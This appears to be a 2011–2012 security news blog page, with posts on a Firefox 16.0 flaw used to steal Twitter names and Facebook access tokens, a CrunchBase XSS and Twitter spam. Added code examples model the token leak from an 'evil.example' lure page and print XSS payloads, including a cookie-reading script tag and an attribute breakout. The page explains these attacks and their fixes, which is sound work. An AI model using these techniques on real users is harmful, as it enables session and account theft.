Showing posts with label Hacking News. Show all posts

Saturday, October 13, 2012

Firefox 16 vulnerability allows spammers to steal Facebook access tokens


Recently a researcher discovered a vulnerability in the then-latest version of Firefox, v16.0, that was initially reported to let an attacker gather detailed information about a user's browsing history. Earlier versions and the follow-up release are not affected.

Although it was initially believed that the vulnerability allowed access to browser history, Mozilla representatives told Ars Technica that "the flaw allowed access to the URL of windows or frames to which the attacker has a reference only—generally the ones that the attacker opened."

Now the researcher has published a proof-of-concept that demonstrates how an attacker can collect your Twitter account name when you click a button. The attacker's page opens a new window and loads a specially crafted Twitter URL; for a user who is already signed in, the window ends up at an address that contains that user's own Twitter ID, and because Firefox 16.0 lets the opener read the URL of a window it opened, the attacker learns the Twitter name of anyone who is signed in.

When I read the story, I started to think from the spammers' point of view. Recently, I reported a Facebook scam that asks users to verify their account by pasting their access token into the hacker's site.


I have just modified the PoC with the spammer's code to display the Facebook authentication token, and it worked for me.



So stealing the access token is very easy: a single click on the attacker's page is enough, with no further effort from the victim. Anyone still on Firefox 16.0 should move to the follow-up release, which is not affected.
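The bug class behind both the Twitter-name PoC and the access-token variant above, as an added example that is not the researcher's PoC or the spammer's code. It is a Node-runnable model: the opener gets a window reference back, the target site's own redirect or OAuth response puts the user's identity in that window's URL, and the only question is whether the browser lets a cross-origin opener read `location.href`. All hostnames, the redirect table and the token value are constructed for the model.

```javascript
// Added example, not the researcher's PoC: a Node-runnable model of the
// Firefox 16.0 bug class. In a browser the attack is a few lines:
//
//   var w = window.open("https://social.example/me");          // site redirects to /<handle>
//   setTimeout(function () { exfil(w.location.href); }, 1500); // should throw; did not in 16.0
//
// A browser that enforces the same-origin policy throws a SecurityError when a
// page reads location.href of a cross-origin window, even one it opened itself.
// Hostnames and the redirect table below are constructed for the model.

// Where the target site sends a signed-in user (constructed sample data).
const REDIRECTS = {
  "https://social.example/me":
    "https://social.example/alice_w",
  "https://social.example/oauth/authorize?response_type=token":
    "https://app.example/callback#access_token=tkn_constructed_123&expires_in=3600",
};

function originOf(url) {
  return new URL(url).origin; // scheme://host[:port]
}

// Model of the WindowProxy the opener gets back. enforceSop=false reproduces
// the Firefox 16.0 behaviour; enforceSop=true reproduces a correct browser.
class WindowProxy {
  constructor(openerOrigin, finalUrl, enforceSop) {
    this.openerOrigin = openerOrigin;
    this.finalUrl = finalUrl;
    this.enforceSop = enforceSop;
  }
  get href() {
    if (this.enforceSop && originOf(this.finalUrl) !== this.openerOrigin) {
      throw new Error("SecurityError: Permission denied to access property 'href'");
    }
    return this.finalUrl;
  }
}

function openWindow(openerUrl, targetUrl, enforceSop) {
  const finalUrl = REDIRECTS[targetUrl] || targetUrl;
  return new WindowProxy(originOf(openerUrl), finalUrl, enforceSop);
}

// What a leaked URL gives away: the first path segment (a profile handle)
// and any OAuth token left in the fragment, as in the Facebook scam above.
function extractIdentity(leakedUrl) {
  const u = new URL(leakedUrl);
  const fragment = new URLSearchParams(u.hash.replace(/^#/, ""));
  return {
    username: u.pathname.split("/").filter(Boolean)[0] || null,
    accessToken: fragment.get("access_token"),
  };
}

// One click on the lure page: open the crafted URL, then read where it landed.
function attack(targetUrl, enforceSop, openerUrl) {
  const w = openWindow(openerUrl || "https://evil.example/lure", targetUrl, enforceSop);
  try {
    return Object.assign({ leaked: true }, extractIdentity(w.href));
  } catch (e) {
    return { leaked: false, error: e.message };
  }
}

if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  console.log("Firefox 16.0 model:", attack("https://social.example/me", false));
  console.log("correct browser   :", attack("https://social.example/me", true));
  console.log("token leak (16.0) :", attack("https://social.example/oauth/authorize?response_type=token", false));
}
```

Two things the model makes visible. The read of `href` is the only thing the bug changed: a cross-origin opener is still allowed to navigate the window it opened, so a correct browser blocks the read, not the `window.open`. And the identity only lands in the URL because the site's own redirect (or an OAuth implicit-grant response) put it there; keeping handles and tokens out of URLs that an attacker-initiated navigation can reach limits what this class of browser bug can leak.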

Tuesday, October 9, 2012

Reflected XSS Vulnerability in Crunchbase



Indian security researcher Nikhil Kulkarni has discovered a reflected cross-site scripting vulnerability in the official website of CrunchBase, a free wiki-style directory of people, technology companies and investors.

The real name field on the user page was found to be vulnerable to XSS. Nikhil immediately reported the vulnerability to TechCrunch and was told not to disclose the issue until it was rectified.

The flaw was fixed after he reported it, but later he found the XSS was exploitable again, so he reported it a second time.

"And the reply I got was that earlier, when they fixed the XSS issue, they found some other code was breaking and hence they had to remove the XSS prevention code," the researcher said.

The vulnerability has now been fixed.
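The shape of the bug and of a fix that does not break other code, as an added example that is not CrunchBase's code. A "real name" taken from the request is reflected into a profile page; the vulnerable version copies it into the markup, the hardened version encodes it at the HTML output sink and leaves the stored value untouched, which is what avoids the "other code was breaking" problem that an input filter tends to cause. The payloads and the `looksExploitable` check are constructed for this example.

```javascript
// Added example, not CrunchBase's code: a reflected XSS in a "real name"
// field and its fix. Encoding happens at the HTML output sink, so the raw
// value is still available to any other code that needs it (search, JSON
// APIs, e-mail); stripping or rewriting the input is what breaks such code.
// Sample payloads are constructed.

function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, function (c) { return map[c]; });
}

// Vulnerable: the name from ?real_name=... is reflected as-is into a text
// node and into a quoted attribute.
function renderProfileVulnerable(realName) {
  return "<h1>Profile of " + realName + "</h1>" +
         '<input name="real_name" value="' + realName + '">';
}

// Hardened: one encoder for both contexts. The attribute MUST stay quoted;
// escapeHtml does not make an unquoted attribute safe.
function renderProfileSafe(realName) {
  const safe = escapeHtml(realName);
  return "<h1>Profile of " + safe + "</h1>" +
         '<input name="real_name" value="' + safe + '">';
}

// Constructed payloads: one for the text context, one that breaks out of
// value="" without using < or >, which naive tag filters miss.
const TEXT_PAYLOAD = "<script>alert(document.cookie)</script>";
const ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="';

// Crude sink check for the example: does a raw <script> tag or an injected,
// quoted event-handler attribute survive into the rendered page? Encoded
// quotes are dropped first so that &quot; onfocus=&quot; does not count.
function looksExploitable(html) {
  const withoutEncodedQuotes = html.replace(/&quot;/g, "");
  return /<script\b/i.test(html) || /\son[a-z]+="[^"]*"/i.test(withoutEncodedQuotes);
}

if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  for (const p of [TEXT_PAYLOAD, ATTR_PAYLOAD]) {
    console.log("vulnerable:", looksExploitable(renderProfileVulnerable(p)), renderProfileVulnerable(p));
    console.log("hardened  :", looksExploitable(renderProfileSafe(p)), renderProfileSafe(p));
  }
}
```

The second payload is the reason encoding has to cover quotes and not just angle brackets: it never contains `<`, so a fix that only strips tags lets it turn the `value` attribute into an `onfocus` handler. Encoding per output context (HTML text, quoted attribute; JavaScript and URL contexts need their own encoders) is what a re-fix should look like, rather than removing the protection when a tag filter collides with legitimate input.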

Security News - Twitter's t.co mistakenly shut down by Melbourne IT


Twitter users were unable to open links in tweets on Sunday after Twitter's URL-shortening domain t.co was mistakenly placed on hold by Melbourne IT.

According to reports, the outage was caused by simple human error at the Melbourne, Australia-based domain registrar while it was actioning a phishing complaint.

“Yesterday in the process of actioning a phishing complaint, our policy team inadvertently placed the t.co domain on hold. The error was realized and rectified in approximately 40 minutes and t.co links again began working,” stated Tony Smith, a spokesperson for Melbourne IT in a CNET interview.

At first it seemed as though the problem was caused by Dyn, a New Hampshire-based company that provides DNS for Twitter's t.co link-shortening service as well as for Zappos and Etsy. But Tom Daly, Dyn's chief scientist, said it was "an issue with the upstream parent zone, .co, the country code domain for Colombia."



Hacking News - Another Twitter Spam "Filming a new film ,starring Katt Williams"





Recently, I reported in E Hacking News that spammers are mentioning your name in tweets and asking for suggestions. Today, one of our Twitter friends, @backtracesec, gave a hint for hunting another Twitter spamming group.

In this campaign, the cyber criminals claim that they are going to film a new movie starring Katt Williams. Katt Williams is an American comedian, rapper and actor, best known for his role as Money Mike in Friday After Next.

"@VictimAccount We're filming a new movie in your city starring Katt WilIiams ! We want you to be in it! go here @PerryCasting" the spam tweet reads. (Note the capital I in place of the l in "WilIiams", which keeps the tweet from matching a search for the real name.)
Here, the spammer's main account, 'PerryCasting', hasn't tweeted anything, but its bio has the following text:

"Welcome! Please proceed now and confirm your availability for the film. FOLLOW THIS LINK · [bit_ly_Link]"

Just like the previous spam tweets, the link redirects through multiple sites and ends at '160tracker[dot]com'. A quick Google search reveals that the site is being used by spammers.

I have collected the fake Twitter accounts that post the same tweets. Here you can find the list of fake accounts:
http://pastebin.com/BRpeLuwt

If you think I have missed some fake accounts, please feel free to send them in or leave a comment with the account name. Reporting them to Twitter as spam is better still.

Tuesday, August 2, 2011

Which Social Networking Sites Are Secure? -Social Network Attacks



Zone Alarm released (a month ago; sorry for the late report) a list of the top social networks ranked by privacy. It also reports the malware attacks seen on those networks. See the following image for the complete report.

Tuesday, July 19, 2011

Microsoft offering $250,000 reward for information on the Rustock botnet


Microsoft is offering a reward of $250,000 for information leading to the identification, arrest and criminal conviction of the individual(s) responsible for controlling the Rustock botnet.

The Rustock botnet enslaved around 1 million computers and forced them to generate billions of spam emails; at its peak it was able to send 30 billion spam messages a day. The botnet also fed other crimes, such as advertising unapproved versions of pharmaceuticals.
